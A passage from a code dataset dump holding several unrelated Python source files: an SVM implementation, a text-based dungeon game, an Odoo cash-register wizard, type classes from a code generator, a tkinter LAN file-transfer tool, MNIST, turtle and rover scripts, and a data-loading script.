X[train_index], X[test_index], T[train_index], T[test_index]\n model = SVM(X_train, T_train, C=c, kernel_function=kernel, poly=poly, sigma=sigma, r=r)\n model.train()\n err += model.testing_error(X_test, T_test)\n errors.append(err)\n\n ind = np.argmin(errors)\n return c_array[ind]\n\n\nclass SVM():\n\n def __init__(self, X, T, kernel_function=\"gaussian\", poly=2, sigma=2,C=None, tol=1.0e-5, r= 0.5):\n\n self.kernel_function, self.poly, self.sigma = kernel_function, poly, sigma\n self.C, self.tol, self.b, self.r = C, tol, 0, r\n\n self.X = X\n self.T = T\n \n # Targets with value 0 result in b=0 ind=0, thus they get the value -1.\n for i in range(len(self.T)):\n if self.T[i] == 0:\n self.T[i] = -1\n \n self.N = self.X.shape[0]\n\n self.p_matrix = np.zeros((self.N, self.N))\n self.alpha_array = np.zeros(self.N)\n self.support_vectors = []\n\n def kernel(self, x, y):\n if self.kernel_function == \"linear\":\n return np.dot(x,y)+1\n elif self.kernel_function == \"polynomial\":\n return np.power(np.dot(x,y)+1, self.poly)\n elif self.kernel_function == \"radial\":\n return np.exp(-(np.linalg.norm(x-y))/(2*np.power(self.sigma,2)))\n elif self.kernel_function == \"gaussian\":\n return np.exp(-self.r**(-2)*np.linalg.norm(x-y)**2)\n\n def calculate_p(self):\n for i in range(self.N):\n for j in range(self.N):\n self.p_matrix[i][j] = self.T[i]*self.T[j]*self.kernel(self.X[i], self.X[j])\n\n def zerofun(self, alpha):\n return np.dot(alpha, self.T)\n\n def objective(self, alpha):\n res = 0\n for i in range(self.N):\n for j in range(self.N):\n res += 0.5 * alpha[i] * alpha[j] * self.p_matrix[i][j]\n \n return res-sum(alpha)\n\n def calculate_alpha(self):\n start = np.zeros(self.N)\n B = [(0, self.C) for b in range(self.N)]\n ret = minimize(self.objective, start, bounds=B, constraints={'type': 'eq', 'fun': self.zerofun})\n self.alpha_array= ret['x']\n\n # Extract non-zero alphas\n for i in range(self.N):\n if self.tol < self.alpha_array[i]:\n self.support_vectors.append([self.alpha_array[i], self.X[i], self.T[i]])\n \n def calculate_b(self):\n\n # Random SV (First one)\n support_target = self.support_vectors[0][2]\n support_vector = self.support_vectors[0][1]\n\n for i in range(self.N):\n if self.tol < self.alpha_array[i]:\n self.b += self.alpha_array[i]*self.T[i]*self.kernel(support_vector, self.X[i])\n self.b -= support_target\n\n def indicator(self, x):\n ind = 0\n for i in range(self.N):\n if self.tol < self.alpha_array[i]:\n ind += self.alpha_array[i]*self.T[i]*self.kernel(x,self.X[i])\n ind -= self.b\n return ind\n \n def train(self):\n self.calculate_p()\n self.calculate_alpha()\n self.calculate_b()\n\n # Not really Useful outside of 2D. \n\n def plot_2d_contour(self, xmin, xmax, ymin, ymax, N):\n xgrid = np.linspace(xmin, xmax, num=N)\n ygrid = np.linspace(ymin, ymax, num=N)\n\n grid = np.array([[self.indicator([x,y]) for x in xgrid] for y in ygrid])\n plt.contour(xgrid, ygrid, grid, (-1.0, 0.0, 1.0), colors = ('red', 'black', 'blue'), linewidths = (1, 3, 1))\n\n def plot_support_vectors(self):\n for i in range(len(self.support_vectors)):\n plt.scatter(self.support_vectors[i][1][0], self.support_vectors[i][1][1], color=\"orange\")\n \n def get_support_vectors(self):\n sv = []\n for i in range(len(self.support_vectors)):\n sv.append([self.support_vectors[i][1][0], self.support_vectors[i][1][1]])\n \n return np.array(sv)\n\n def error_rate(self, X, T):\n\n predictions = np.array([self.indicator(x) for x in X])\n predictions = np.where(predictions > 0.5, 1, -1)\n error_counts = np.count_nonzero(predictions - T)\n\n return error_counts/T.shape[0]\n\n def training_error(self):\n return self.error_rate(self.X, self.T)\n\n def testing_error(self, X, T):\n return self.error_rate(X, T)\n\n\n\n\n\n\n","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"475314465","text":"import time\nimport os\nimport getch\nimport static_boards\nimport level_two\nimport display\nimport statystyki\nimport random\nimport create_character\nimport hall_of_fame\n\ndef score():\n \n name, start, end = main()\n a = str(end-start)\n hall_of_fame.write_to_file(name, a)\n hall_of_fame.read_score()\n\ndef main():\n name = create_character.create_character()\n \n static_boards.introduction_board()\n time.sleep(1)\n os.system(\"clear\")\n static_boards.autors_board()\n time.sleep(1)\n os.system(\"clear\")\n static_boards.wsad_board()\n time.sleep(1)\n os.system(\"clear\")\n\n player_x = 5 # pozycja wyjściowa gracza\n player_y = 2\n # statystyki\n level = 1\n hp,atack = create_character.chose_hero()\n hp, atack = statystyki.hero_statistics(hp, atack)\n live, atc = statystyki.enemy_statistic(3, random.randint(1, 3))\n score = 0\n level_one_board = level_two.draw_board()\n board = level_two.create_board(level_one_board)\n # Time start\n start = time.time()\n condition = True\n while condition == True:\n print(\"Player stats HP:\", hp, \"Atak:\", atack)\n print(\"Moster live:\", live, \"Monster atack\", atc)\n place_before = board[player_y][player_x]\n board = level_two.insert_player(board, player_x, player_y)\n level_two.print_board(board)\n\n old_player_x = player_x\n old_player_y = player_y\n key = getch.getch()\n os.system(\"clear\")\n\n if key == 'w':\n player_y -= 1\n if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n player_y += 1\n\n elif key == 'a':\n player_x -= 1\n if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n player_x += 1\n\n elif key == 's':\n player_y += 1\n if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n player_y -= 1\n\n elif key == 'd':\n player_x += 1\n if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n player_x -= 1\n\n elif key == 'q':\n break\n if board[player_y][player_x] == 'T':\n display.next_level()\n if board[player_y][player_x] == 'p':\n display.quest_1()\n if place_before == \"!\":\n print(\"Player {} attack monster {}\".format(hp, atack))\n # hp, atack = hero_statistics(hp-atc, atack)\n hp = hp - atc\n print(\"Monster {} attack player {}\".format(live, atc))\n # live, atc = enemy_statistic(live-atack, atc)\n live = live - atack \n if live <= 0:\n board[old_player_y][old_player_x] = \"*\"\n score += 1\n live = 3\n elif live > 0:\n board[old_player_y][old_player_x] = place_before\n if hp == 0:\n display.game_over()\n score()\n condition = False\n\n if score == 5:\n level_two_board = level_two.draw_board_2()\n board = level_two.create_board_2(level_two_board)\n if score == 9:\n level_three_board = level_two.draw_board_3()\n board = level_two.create_board_3(level_three_board)\n if score == 11:\n display.you_win()\n end = time.time\n break\n elif place_before != \"!\":\n board[old_player_y][old_player_x] = place_before\n return name, start, end\nscore()\nmain()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"44221077","text":"# -*- encoding: utf-8 -*-\nfrom osv import fields,osv\nimport time\nfrom datetime import datetime\nfrom dateutil.relativedelta import *\nfrom tools.translate import _\nimport logging\nlogger = logging.getLogger('dotcom_pos_abrir_caixa')\n\nclass dotcom_pos_abrir_caixa(osv.osv_memory):\n \n def _get_session(self, cr, uid, object=False, field=False, context=None):\n caixa_pool = self.pool.get('dotcom.pos.caixa.config')\n ids = caixa_pool.search(cr, uid, [('estado','=',True),('user_id','=',uid)], context=context)\n return ids and ids[0]\n \n def _get_total_in_session(self, cr, uid, object=False, field=False, context=None):\n if context is None:\n context = {}\n history = self.pool.get('dotcom.pos.history')\n last = history.search(cr, uid, [('user_id','=',uid)])\n real_opening = 0\n if last:\n my_last = history.browse(cr, uid, last and last[0])\n real_opening = my_last.next_day or 0\n return real_opening\n \n _name='dotcom.pos.caixa.open'\n _columns ={\n 'state': fields.selection([('init','init'),('done','done')], 'state', readonly=True),\n 'caixa_id': fields.many2one('dotcom.pos.caixa.config','Caixa'),\n 'added': fields.float('Saldo de Abertura'),\n 'injection': fields.float('Entrada de Caixa'),\n }\n _defaults = {\n 'state': 'init',\n 'added': lambda self,cr,uid,c: self._get_total_in_session(cr, uid, 'dotcom.pos.caixa.open', context=c),\n 'caixa_id': lambda self,cr,uid,c: self._get_session(cr, uid, 'dotcom.pos.caixa.open', context=c),\n }\n \n def start(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n self.write(cr, uid, ids, {'state': 'done'}, context=context)\n return {\n 'name': _('Abrir Caixa'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': False,\n 'res_model': 'dotcom.pos.caixa.open',\n 'domain': [],\n 'context': dict(context, active_ids=ids),\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n 'res_id': ids and ids[0] or False\n }\n\n def processar(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n caixas = []\n opened = []\n created_pos = []\n today = time.strftime('%Y-%m-%d')\n pos_pool = self.pool.get('dotcom.pos.pos')\n caixa_pool = self.pool.get('dotcom.pos.caixa.config')\n history = self.pool.get('dotcom.pos.history')\n \n data = self.browse(cr,uid,ids)[-1]\n \n opened = pos_pool.search(cr, uid, [('state','=','open'),('user_id','=',uid)])\n if opened:\n raise osv.except_osv(_('Invalid action !'), _('O utilizador já possui uma caixa em aberto!'))\n \n last = history.search(cr, uid, [('user_id','=',uid)])\n real_opening = 0\n if last:\n my_last = history.browse(cr, uid, last and last[0])\n real_opening = my_last.next_day or 0\n new_opening = real_opening\n inject = False\n if data.injection>0:\n inject=True\n new_opening = real_opening + data.injection\n \n caixas = caixa_pool.search(cr,uid,[('on','=',False),('estado','=',True),('user_id','=',uid)])\n \n if caixas:\n for caixa in caixa_pool.browse(cr,uid,caixas):\n \n pos = {}\n pos['caixa_id'] = caixa.id\n pos['ref'] = 'POS/%s/%s' % (str(caixa.ref),str(time.strftime('%d.%m')))\n user = caixa.user_id and caixa.user_id.name or ''\n pos['name'] = 'POS/%s/%s' % (str(caixa.user_id.name),str(user))\n pos['data'] = time.strftime('%Y-%m-%d'),\n pos['state'] = 'open'\n sequencia = None\n for sequence in caixa.sequence_ids:\n lower = time.strftime(str(sequence.fiscal_year_id.date_start))\n bigger = time.strftime(str(sequence.fiscal_year_id.date_stop))\n \n if lower<=today<=bigger:\n sequencia = sequence.id\n break\n pos['sequence_id'] = sequencia\n pos['opening'] = new_opening or 0\n id_pos = self.pool.get('dotcom.pos.pos').create(cr,uid,pos)\n created_pos.append(id_pos)\n \n balcao = {}\n balcao['caixa_id'] = id_pos\n balcao['config_caixa_id'] = caixa.id\n \n balcao_id = caixa and caixa.balcao_id and caixa.balcao_id.id\n if balcao_id:\n self.pool.get('dotcom.balcao.vendas').write(cr, uid, balcao_id, balcao)\n \n self.pool.get('dotcom.pos.caixa.config').write(cr, uid, [caixa.id], {'on':True})\n logger.info('Created POS with ID: %s' %created_pos)\n \n for pos in created_pos:\n \n pos_line = {}\n pos_line['data'] = time.strftime('%Y-%m-%d %H:%M:%S')\n pos_line['desc'] = _('Ultimo fecho')\n pos_line['pos_id'] = pos\n pos_line['valor'] = real_opening\n pos_line['operacao'] = 'open'\n self.pool.get('dotcom.pos.linha').create(cr, uid, pos_line)\n \n if inject:\n other_line = {}\n other_line['data'] = time.strftime('%Y-%m-%d %H:%M:%S')\n other_line['desc'] = _('Ultimo Fecho')\n other_line['pos_id'] = pos\n other_line['valor'] = data.injection or 0\n other_line['operacao'] = 'in'\n self.pool.get('dotcom.pos.linha').create(cr, uid, other_line)\n \n self.pool.get('dotcom.pos.pos').change_filter(cr, uid, created_pos, context=context)\n \n return {\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'dotcom.pos.pos',\n 'res_id':created_pos,\n 'type': 'ir.actions.act_window',\n 'domain': \"[('state','in',['draft','open'])]\",\n 'context': context,\n }\n \ndotcom_pos_abrir_caixa()","sub_path":"dotcom_pos_new/wizard/abrir_caixa.py","file_name":"abrir_caixa.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"216049695","text":"from abc import ABC, abstractmethod\nfrom enum import Enum, auto\nfrom itertools import chain\nfrom typing import (\n TYPE_CHECKING,\n Any,\n ClassVar,\n Dict,\n FrozenSet,\n Iterable,\n Iterator,\n List,\n Optional,\n Sequence,\n Set,\n Tuple,\n Type,\n TypeVar,\n Union,\n)\n\nfrom pydantic import create_model\n\nfrom datamodel_code_generator import Protocol, runtime_checkable\nfrom datamodel_code_generator.format import PythonVersion\nfrom datamodel_code_generator.imports import (\n IMPORT_ABC_MAPPING,\n IMPORT_ABC_SEQUENCE,\n IMPORT_DICT,\n IMPORT_LIST,\n IMPORT_LITERAL,\n IMPORT_LITERAL_BACKPORT,\n IMPORT_MAPPING,\n IMPORT_OPTIONAL,\n IMPORT_SEQUENCE,\n IMPORT_UNION,\n Import,\n)\nfrom datamodel_code_generator.reference import Reference, _BaseModel\n\nT = TypeVar('T')\n\n\nclass StrictTypes(Enum):\n str = 'str'\n bytes = 'bytes'\n int = 'int'\n float = 'float'\n bool = 'bool'\n\n\ndef chain_as_tuple(*iterables: Iterable[T]) -> Tuple[T, ...]:\n return tuple(chain(*iterables))\n\n\n@runtime_checkable\nclass Modular(Protocol):\n @property\n def module_name(self) -> str:\n raise NotImplementedError\n\n\nclass DataType(_BaseModel): # type: ignore\n type: Optional[str]\n reference: Optional[Reference]\n data_types: List['DataType'] = []\n is_func: bool = False\n kwargs: Optional[Dict[str, Any]]\n import_: Optional[Import] = None\n python_version: PythonVersion = PythonVersion.PY_37\n is_optional: bool = False\n is_dict: bool = False\n is_list: bool = False\n is_custom_type: bool = False\n literals: List[Union[int, str]] = []\n use_standard_collections: bool = False\n use_generic_container: bool = False\n alias: Optional[str] = None\n parent: Optional[Any] = None\n children: List[Any] = []\n strict: bool = False\n dict_key: Optional['DataType'] = None\n\n _exclude_fields: ClassVar[Set[str]] = {'parent', 'children'}\n _pass_fields: ClassVar[Set[str]] = {'parent', 'children', 'data_types', 'reference'}\n\n @classmethod\n def from_import(\n cls: Type['DataTypeT'],\n import_: Import,\n *,\n is_optional: bool = False,\n is_dict: bool = False,\n is_list: bool = False,\n is_custom_type: bool = False,\n strict: bool = False,\n kwargs: Optional[Dict[str, Any]] = None,\n ) -> 'DataTypeT':\n return cls(\n type=import_.import_,\n import_=import_,\n is_optional=is_optional,\n is_dict=is_dict,\n is_list=is_list,\n is_func=True if kwargs else False,\n is_custom_type=is_custom_type,\n strict=strict,\n kwargs=kwargs,\n )\n\n @property\n def unresolved_types(self) -> FrozenSet[str]:\n return frozenset(\n {\n t.reference.path\n for data_types in self.data_types\n for t in data_types.all_data_types\n if t.reference\n }\n | ({self.reference.path} if self.reference else set())\n )\n\n def replace_reference(self, reference: Reference) -> None:\n if not self.reference: # pragma: no cover\n raise Exception(\n f'`{self.__class__.__name__}.replace_reference()` can\\'t be called'\n f' when `reference` field is empty.'\n )\n\n self.reference.children.remove(self)\n self.reference = reference\n reference.children.append(self)\n\n @property\n def module_name(self) -> Optional[str]:\n if self.reference and isinstance(self.reference.source, Modular):\n return self.reference.source.module_name\n return None # pragma: no cover\n\n @property\n def full_name(self) -> str:\n module_name = self.module_name\n if module_name:\n return f'{module_name}.{self.reference.short_name}' # type: ignore\n return self.reference.short_name # type: ignore\n\n @property\n def all_data_types(self) -> Iterator['DataType']:\n for data_type in self.data_types:\n yield from data_type.all_data_types\n yield self\n\n @property\n def all_imports(self) -> Iterator[Import]:\n for data_type in self.data_types:\n yield from data_type.all_imports\n yield from self.imports\n\n @property\n def imports(self) -> Iterator[Import]:\n if self.import_:\n yield self.import_\n imports: Tuple[Tuple[bool, Import], ...] = (\n (self.is_optional, IMPORT_OPTIONAL),\n (len(self.data_types) > 1, IMPORT_UNION),\n )\n if any(self.literals):\n import_literal = (\n IMPORT_LITERAL\n if self.python_version.has_literal_type\n else IMPORT_LITERAL_BACKPORT\n )\n imports = (\n *imports,\n (any(self.literals), import_literal),\n )\n\n if self.use_generic_container:\n if self.use_standard_collections:\n imports = (\n *imports,\n (self.is_list, IMPORT_ABC_SEQUENCE),\n (self.is_dict, IMPORT_ABC_MAPPING),\n )\n else:\n imports = (\n *imports,\n (self.is_list, IMPORT_SEQUENCE),\n (self.is_dict, IMPORT_MAPPING),\n )\n elif not self.use_standard_collections:\n imports = (\n *imports,\n (self.is_list, IMPORT_LIST),\n (self.is_dict, IMPORT_DICT),\n )\n for field, import_ in imports:\n if field and import_ != self.import_:\n yield import_\n\n if self.dict_key:\n yield from self.dict_key.imports\n\n def __init__(self, **values: Any) -> None:\n super().__init__(**values)\n\n for type_ in self.data_types:\n if type_.type == 'Any' and type_.is_optional:\n if any(\n t for t in self.data_types if t.type != 'Any'\n ): # pragma: no cover\n self.is_optional = True\n self.data_types = [\n t\n for t in self.data_types\n if not (t.type == 'Any' and t.is_optional)\n ]\n break\n\n for data_type in self.data_types:\n if data_type.reference or data_type.data_types:\n data_type.parent = self\n\n if self.reference:\n self.reference.children.append(self)\n\n @property\n def type_hint(self) -> str:\n type_: Optional[str] = self.alias or self.type\n if not type_:\n if len(self.data_types) > 1:\n type_ = f\"Union[{', '.join(data_type.type_hint for data_type in self.data_types)}]\"\n elif len(self.data_types) == 1:\n type_ = self.data_types[0].type_hint\n elif self.literals:\n type_ = (\n f\"Literal[{', '.join(repr(literal) for literal in self.literals)}]\"\n )\n else:\n if self.reference:\n type_ = self.reference.short_name\n else:\n # TODO support strict Any\n # type_ = 'Any'\n type_ = ''\n if self.reference and self.python_version == PythonVersion.PY_36:\n type_ = f\"'{type_}'\"\n if self.is_list:\n if self.use_generic_container:\n list_ = 'Sequence'\n elif self.use_standard_collections:\n list_ = 'list'\n else:\n list_ = 'List'\n type_ = f'{list_}[{type_}]' if type_ else list_\n elif self.is_dict:\n if self.use_generic_container:\n dict_ = 'Mapping'\n elif self.use_standard_collections:\n dict_ = 'dict'\n else:\n dict_ = 'Dict'\n if self.dict_key or type_:\n key = self.dict_key.type_hint if self.dict_key else 'str'\n type_ = f'{dict_}[{key}, {type_ or \"Any\"}]'\n else: # pragma: no cover\n type_ = dict_\n if self.is_optional and type_ != 'Any':\n type_ = f'Optional[{type_}]'\n elif self.is_func:\n if self.kwargs:\n kwargs: str = ', '.join(f'{k}={v}' for k, v in self.kwargs.items())\n return f'{type_}({kwargs})'\n return f'{type_}()'\n return type_\n\n\nDataType.update_forward_refs()\n\nDataTypeT = TypeVar('DataTypeT', bound=DataType)\n\n\nclass Types(Enum):\n integer = auto()\n int32 = auto()\n int64 = auto()\n number = auto()\n float = auto()\n double = auto()\n decimal = auto()\n time = auto()\n string = auto()\n byte = auto()\n binary = auto()\n date = auto()\n date_time = auto()\n password = auto()\n email = auto()\n uuid = auto()\n uuid1 = auto()\n uuid2 = auto()\n uuid3 = auto()\n uuid4 = auto()\n uuid5 = auto()\n uri = auto()\n hostname = auto()\n ipv4 = auto()\n ipv6 = auto()\n boolean = auto()\n object = auto()\n null = auto()\n array = auto()\n any = auto()\n\n\nclass DataTypeManager(ABC):\n def __init__(\n self,\n python_version: PythonVersion = PythonVersion.PY_37,\n use_standard_collections: bool = False,\n use_generic_container_types: bool = False,\n strict_types: Optional[Sequence[StrictTypes]] = None,\n ) -> None:\n self.python_version = python_version\n self.use_standard_collections: bool = use_standard_collections\n self.use_generic_container_types: bool = use_generic_container_types\n self.strict_types: Sequence[StrictTypes] = strict_types or ()\n\n if (\n use_generic_container_types and python_version == PythonVersion.PY_36\n ): # pragma: no cover\n raise Exception(\n \"use_generic_container_types can not be used with target_python_version 3.6.\\n\"\n \" The version will be not supported in a future version\"\n )\n\n if TYPE_CHECKING:\n self.data_type: Type[DataType]\n else:\n self.data_type: Type[DataType] = create_model(\n 'ContextDataType',\n python_version=python_version,\n use_standard_collections=use_standard_collections,\n use_generic_container=use_generic_container_types,\n __base__=DataType,\n )\n\n @abstractmethod\n def get_data_type(self, types: Types, **kwargs: Any) -> DataType:\n raise NotImplementedError\n\n def get_data_type_from_full_path(\n self, full_path: str, is_custom_type: bool\n ) -> DataType:\n return self.data_type.from_import(\n Import.from_full_path(full_path), is_custom_type=is_custom_type\n )\n","sub_path":"datamodel_code_generator/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":10896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"625562181","text":"from threading import Thread\nimport tkinter\nfrom tkinter import filedialog\nfrom tkinter import *\nfrom tkinter import messagebox\nimport os\nimport socket\n\n\ndef search_for_file_path():\n global tempdir\n currdir = os.getcwd()\n tempdir = filedialog.askopenfilename(filetypes=((\"All files\", \"*\"), (\"Template files\", \"*.type\")))\n if len(tempdir) > 0:\n print(\"You chose: %s\" % tempdir)\n confirm()\n\n\ndef hostip():\n global conn\n global s\n global host\n global port\n global addr\n global hostt\n s = socket.socket()\n host = socket.gethostname()\n hostt = socket.gethostbyname(host)\n port = 5000\n\n\ndef send():\n flag = \"1\"\n conn.send(flag.encode())\n filename = tempdir\n ff = tempdir.split(\"/\")\n conn.send(str(ff[-1]).encode())\n file = open(filename, 'rb')\n file_data = file.read(40960000)\n conn.send(file_data)\n print(\"Data has been transmitted successfully\")\n\n\ndef confirm():\n def conf1():\n MsgBox = messagebox.askquestion('Confirm', 'Do you want to start the server and send %s ?' % (str(tempdir)),\n icon='warning')\n if MsgBox == 'yes':\n send()\n else:\n messagebox.showinfo('Return', 'You will now return to the application screen')\n\n cof = Button(root, text=\"Send\", height=1, width=8, fg=\"white\", font=(\"Arial\", 10), bg=\"black\", command=conf1)\n cof.place(x=130, y=220)\n\n\ndef wait_for_connection():\n try:\n s.bind((hostt, port))\n s.listen(10)\n conn, addr = s.accept()\n print(addr, \"Has connected to the server\")\n root.after(1, ww.destroy())\n conn = Label(root, text=\"%s has connected.\" % (str(addr[0])), font=(\"Arial\", 13))\n conn.place(x=40, y=140)\n select_file = Label(root, text=\"Select File: \", font=(\"Arial Bold\", 12))\n select_file.place(x=40, y=180)\n file_name = StringVar()\n sel_but = Button(root, text=\"Browse\", height=1, width=8, fg=\"white\", font=(\"Arial\", 10), bg=\"black\",\n command=search_for_file_path)\n sel_but.place(x=130, y=180)\n\n except Exception as e:\n print(e)\n\n\ndef startserver():\n root.after(1, start_button.destroy())\n global ww\n ww = Label(root, text=\"Waiting for Incoming Connections\", font=(\"Arial\", 13))\n ww.place(x=40, y=140)\n global t\n t = Thread(target=wait_for_connection)\n try:\n t.start()\n except Exception as e:\n print(e)\n\n\n# ch = input(\"Press Enter to select file.\")\nhostip()\nglobal root\nglobal start_button\nroot = tkinter.Tk()\nroot.title(\"File transter\")\nroot.geometry(\"330x300\")\nLabel(text=\"LAN File Transfer\", bg=\"black\", fg=\"white\", width=\"300\", height=\"2\", font=(\"Calibri\", 13)).pack()\nLabel(root, text=\"Hostname:\", font=(\"Arial Bold\", 13)).place(x=16, y=60)\naa = StringVar()\nb = Entry(root, textvariable=aa, font=(\"Arial\", 13), state=\"disabled\")\naa.set(host)\nb.place(x=120, y=60)\nLabel(root, text=\"IP Address:\", font=(\"Arial Bold\", 13)).place(x=10, y=100)\naaa = StringVar()\nbb = Entry(root, textvariable=aaa, font=(\"Arial\", 13), state=\"disabled\")\naaa.set(socket.gethostbyname(host))\nbb.place(x=120, y=100)\nstart_button = Button(root, text=\"Start Server\", width=12, height=1, bg=\"black\", fg=\"white\", command=startserver)\nstart_button.place(x=120, y=140)\nroot.mainloop()\n","sub_path":"LaN/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227165355","text":"# creating the set of ones and sevens\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mymnist as mm\n\n# set paths\ndata_path = '../data/'\npath_train_imgs = data_path + 'train-images.idx3-ubyte'\npath_train_lbls = data_path + 'train-labels.idx1-ubyte'\n\n# use parser to get the 3D array of images and the 1D vector of labels\nimages, labels = mm.MNIST_parser(path_train_imgs, path_train_lbls)\n\n# sanity check\nprint(images.shape)\nprint(labels[38])\nmm.digit_painter(images[38])\n\n# fix quantities of 1s and 7s to retain\n# allows for later flexibility\nn1 = 1000\nn7 = 5000\n\n# select n1 ones\nlabels_1 = np.full((n1,), 1) # these are just ones..\nimages_1 = images[labels == 1][:n1] # !No error if n1 > n1_total\n\n# select n2 sevens\nlabels_7 = np.full((n7,), 7)\nimages_7 = images[labels == 7][:n7]\n\n# concatenating:\nlabels_17 = np.concatenate((labels_1, labels_7))\nimages_17 = np.concatenate((images_1, images_7))\nprint(labels_17.shape)\nprint(images_17.shape)\n\n# shuffle things around\nshuffle = np.random.permutation(n1 + n7)\nlabels_17 = labels_17[shuffle]\nimages_17 = images_17[shuffle]\n\n# sanity check\nprint(labels_17[:10])\nmm.digit_painter(images_17[:10])\n\n# save if needed\n#np.save(\"../data/images_1_7.npy\", images_17)\n#np.save(\"../data/labels_1_7.npy\", labels_17)","sub_path":"sample/create_set_1_7.py","file_name":"create_set_1_7.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"344888729","text":"import turtle\n\ndef drunk_pirate(mov):\n wn = turtle.Screen()\n wn.bgcolor('lightgreen')\n t = turtle.Turtle()\n t.shape('turtle')\n t.color('blue')\n\n for (angle, move) in mov:\n t.left(angle)\n t.forward(move)\n\n\n wn.mainloop()\n\nmoves = [(160, 200), (-43, 100), (270, 80), (-43, 120)]\ndrunk_pirate(moves)","sub_path":"ex_7_26_11.py","file_name":"ex_7_26_11.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"232226780","text":"########################################################\n#------------------------------------------------------#\n#\n# Machine Perception and Cognitive Robotics Laboratory\n#\n# Center for Complex Systems and Brain Sciences\n# Florida Atlantic University\n#\n#------------------------------------------------------#\n########################################################\n#------------------------------------------------------#\n#LabManual\n\n\n#timer\n\nfrom rover import Rover20\nimport time\n\n\ndef main(): # defining the function called \"main()\"\n rover = Rover20() # redefine the module Rover20 so we can use \"rover\" instead. It makes things easier.\n\n rover.turnLightsOn() # turn on green lights\n time.sleep(1) # make the rover wait 1 second in its current state\n\n rover.turnLightsOff() # turn off green lights. Duh!\n time.sleep(1) # make the rover wait 1 second in its current state\n\n rover.close() # close rover\n\n\nmain() # run the function we have just defined\n","sub_path":"Intro/3_LightsOn/LightsOn.py","file_name":"LightsOn.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"118111482","text":"import datetime\n\ncur = datetime.datetime.now()\nprint(cur)\ndef month_day(year, month):\n if month <= 6:\n if month % 2 == 1:\n return days[3]\n elif month != 2: \n return days[2]\n elif (year%4 == 0) and (year%100 != 0) or (year%400) == 0:\n return days[1]\n else:\n return days[0]\ndays = [28,29,30,31]\n\nprint(month_day(cur.year,cur.month),'days for', cur.year, '-', cur.month)\n","sub_path":"2020/0317.py","file_name":"0317.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"387892690","text":"\n# coding: utf-8\n\n# In[19]:\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import KFold\nfrom sklearn.datasets import load_boston\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score, auc\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn import metrics\nfrom sklearn.multiclass import OneVsRestClassifier\nprint(\"Packages Loaded\", flush = True)\n#%%\nimport h2o\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom h2o.grid.grid_search import H2OGridSearch\n\nh2o.init()\n\n# In[3]:\n\n#For merging all files\nimport numpy as np\nimport pandas as pd\nimport os\nos.chdir('/home/bduser/BigDataLabProjects/ICS/QCRI')\n#%%\nd1 = pd.read_csv('data_matrix50k.csv')\nd1.drop(d1.columns[[0]], axis=1, inplace=True)\n#Read data matrix\nprint(\"First CSV Loaded\",flush = True)\n#%%\n#d2 = pd.read_csv('data_matrix100k.csv')\n#d2.drop(d2.columns[[0]], axis=1, inplace=True)\n#print(\"Second CSV Loaded\",flush = True)\n##%%\n#d3 = pd.read_csv('data_matrix150k.csv')\n#d3.drop(d3.columns[[0]], axis=1, inplace=True)\n#print(\"Third CSV Loaded\",flush = True)\n##%%\n#d4 = pd.read_csv('data_matrix182k.csv')\n#d4.drop(d4.columns[[0]], axis=1, inplace=True)\n#print(\"Fourth CSV Loaded\",flush = True)\n##%%\n#frames = [d1, d2, d3, d4]\n#x = pd.concat(frames)\n#print(\"Data matrix generated\",flush = True)\n#print(x.shape,flush = True)\n##%%\n#print(\"Loading Class Labels\",flush = True)\n#c = pd.read_csv(\"Class.csv\")\n#print(c.shape, flush = True)\n#%%\n#Class = pd.read_csv(\"class5k.csv\")\n#Class.drop(Class.columns[[0]], axis=1, inplace=True)\n#x = d1.head(5000)\n#c = Class\n#%%\n#df_matrix = df.values\n\n\n#data_matrix = np.append(df_matrix, c, axis=1) #appends the data matrix and labels \n\n#x1 = pd.DataFrame(data_matrix)\n#x1.to_csv('QCRIFulldata.csv')\n\n#one = x1.loc[x1[18191] == 1] 